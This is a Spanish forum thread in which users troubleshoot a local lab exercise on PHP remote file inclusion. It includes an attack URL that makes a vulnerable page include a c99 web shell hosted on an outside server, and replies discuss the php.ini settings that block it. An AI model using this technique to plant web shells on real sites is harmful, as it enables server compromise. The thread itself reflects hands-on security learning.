Buenas, tome un ejemplo de un codigo vulnerable de la wiki de elhacker.net.

Este codigo que voy a poner a continuacion, lo tengo en un wamp, es decir me instale un servidor local para hacer la prueba.

El index.html seria el siguiente:


El rfi.php seria el siguiente:


Ahora bien, me cree una cuenta en un servidor gratuito, para ser mas especifico en este : 000webhost.com

Y subi una shell(c99) con extension en txt.

Ahora bien, verifique efectivamente que la web esta sea vulnerable de al siguiente manera : http://localhost/rfi.php?cont=http://google.com , efectivamente abre google.

Ahora, si pruebo hacer lo siguiente :

http://localhost/rfi.php?cont=http://mipagina/shell.txt

Me dan los siguientes errores y no entiendo el motivo.


Warning: include(http://mipagina.com/shell.txt) [function.include]: failed to open stream: HTTP request failed! HTTP/1.0 404 Not Found in C:\wamp\www\rfi.php on line 4

Warning: include() [function.include]: Failed opening 'http://mipagina.com/shell.txt' for inclusion (include_path='.;C:\php5\pear') in C:\wamp\www\rfi.php on line 4

Alguien entiendo cual es el problema? o si estoy haciendo algo mal?

Saludos y gracias.

usa un localhost para las pruebas
 deben ser reestricciones del php.ini como dice KaozC9

asdasdasd

A mi me pasa algo parecido pero ni sikiera me deja abrir google... el erro que me da a mi es el siguiente

Warning: include() [function.include]: http:// wrapper is disabled in the server configuration by allow_url_include=0 in C:\xampp\htdocs\fileinclusion\index.php on line 13

He cambiado el php.ini y e puesto a On los dos parametros pero nada de nada... ¿alguien sabe como se debe confifurar el php.ini para poder hacer las pruebas?

Saludos !

bale y yo pegandome con el php.ini como un tonto a ver si veia algo... jajaj muchas gracias